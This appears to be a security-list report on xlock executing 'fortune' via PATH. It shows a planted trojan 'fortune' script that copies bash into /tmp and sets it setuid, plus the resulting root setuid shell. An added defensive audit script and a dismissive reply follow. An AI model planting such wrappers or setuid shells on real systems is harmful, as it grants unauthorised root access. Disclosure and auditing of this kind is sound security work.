When xlock is running, it may run the fortune command for one of its screen savers. The fortune program on redhat 6.2 resides in /usr/games. By default this is not in anybody's $PATH. When xlock tries to run fortune it normally prints "sh: fortune: command not found". To test a theory I created a file in /bin called fortune. It included the following.

[root@inflammation /bin]# cat fortune
cp /bin/bash /tmp
chmod +s /tmp/bash
/usr/games/fortune

After a few times of running xlock, it ran fortune and actually ran fortune. I then did an ls in /tmp to see what was there and to my surprise I have a nice setuid bash shell.

[root@inflammation /bin]# ls -l /tmp
total 488
-rwsr-sr-x   1 root     root       316848 Dec  6 11:28 bash

I realize that by default it would be hard to put such a script in any of the standard bin paths (/bin:/usr/bin:/sbin:/usr/sbin etc). But it may be possible to gain elevated privileges and then overwrite another binary with a similar script and rename it to 'fortune'.
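The two things an administrator would want to check after reading the report above are (a) whether any entry of the PATH a root-run helper like xlock inherits is a place an unprivileged user can drop a program, and (b) whether a setuid copy of a shell has already appeared somewhere like /tmp. The script below is an added example, not code from the original post or from xlock; the function names, the flagging rules and the scratch directory layout it builds for its own demonstration are my own constructions.

```sh
#!/bin/sh
# Added example (not from the original post): audit a PATH value the way a
# defender would after the xlock/fortune report, then look for the artifact
# the post found (a setuid file in a scratch directory).

# insecure_path_dirs PATH
# Print one line per PATH entry a privileged process should not trust:
#   empty-entry(.)  an empty field, which the shell treats as "."
#   relative X      a relative entry (resolved from the current directory)
#   missing X       an entry that does not exist
#   writable X      a directory writable by group or other (sticky /tmp
#                   still counts: anyone may create a new "fortune" there)
insecure_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r _d; do
        if [ -z "$_d" ]; then
            echo "empty-entry(.)"
            continue
        fi
        case "$_d" in
            /*) ;;
            *)  echo "relative $_d"; continue ;;
        esac
        if [ ! -d "$_d" ]; then
            echo "missing $_d"
            continue
        fi
        # ls -ldL follows symlinks and prints a mode like drwxrwxrwt;
        # character 6 is group-write and character 9 is other-write.
        _mode=$(ls -ldL "$_d" | cut -c1-10)
        case "$_mode" in
            ?????w*|????????w?) echo "writable $_d ($_mode)" ;;
        esac
    done
}

# setuid_files_in DIR
# Print every regular file under DIR with the setuid bit set, one per line.
setuid_files_in() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Constructed demonstration: a scratch tree standing in for the system, with
# one properly owned bin directory, one world-writable one, and a planted
# setuid file in the writable one. Everything is removed at the end.
demo_root=$(mktemp -d)
mkdir "$demo_root/safebin" "$demo_root/openbin"
chmod 755 "$demo_root/safebin"
chmod 777 "$demo_root/openbin"
: > "$demo_root/openbin/fortune"
chmod 4755 "$demo_root/openbin/fortune"

echo "== PATH entries a root-run helper should not trust =="
insecure_path_dirs "$demo_root/safebin:$demo_root/openbin:games:/no-such-dir:"
echo "== setuid files under $demo_root =="
setuid_files_in "$demo_root"

rm -rf "$demo_root"
```

To run the same audit on a live machine, pass the PATH the privileged process actually uses (for a screen saver started from a login session that is the user's own $PATH, which is the point of the report) and point setuid_files_in at /tmp or any other world-writable directory.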
If you can place something in those standard paths, you may replace other binaries too and can even get root privileges in another way... so I say: no bug!